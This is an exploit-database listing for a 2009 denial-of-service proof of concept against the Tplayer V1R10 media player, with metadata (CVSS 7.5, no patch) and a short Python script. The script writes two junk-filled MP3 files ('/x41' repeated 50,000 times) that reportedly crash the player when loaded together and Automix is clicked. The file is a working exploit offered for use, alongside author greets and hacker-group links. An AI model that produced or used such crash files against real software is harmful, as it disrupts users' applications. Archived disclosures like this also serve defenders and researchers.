Tplayer V1R10 DoS Exploit

vendor:

Tplayer

by:

41.w4r10r

7,5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Tplayer

Affected Version From: V1R10

Affected Version To: V1R10

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

This exploit is for Tplayer V1R10. It creates two files, crash.mp3 and crash2.mp3, which contain junk data of length 50000. When both of these files are loaded in the player and the Automix button is clicked, the player crashes.

Mitigation:

N/A

Source

Exploit-DB raw data:

#!/usr/bin/python
print "--------------------Exploit By 41.w4r10r------------------------------\n"
print "-------------------41.w4r10r@gmail.com-----------------------------\n"
print "----------------Tplayer V1R10 DoS Exploit------------------------------\n"
print "-------------Vendor Site : http://www.flicenr.ca-------------------------\n"
print "Greets:B0nd, Ne0, Godwin_Austin, Fb1H2s, Eberly, Punter, The_Empty(), DZZ, Micr0 \n \n"
print "  Catch Us :  www.Garahe4hackers.com | www.Andhrahackers.com | www.ICW.in \n \n"
print "-------------------------Indian Hackers Rock-----------------------------------"

junk = "/x41" * 50000;
filename = "crash.mp3";
file = open(filename,"w")
file.writelines(junk)
file.close()
filename2="crash2.mp3";
file=open(filename2,"w")
file.writelines(junk)
file.close()
print "Two Files Created "
print "[+]Usage: Load both of Created Files in player and click on Automix Button :)"
raw_input()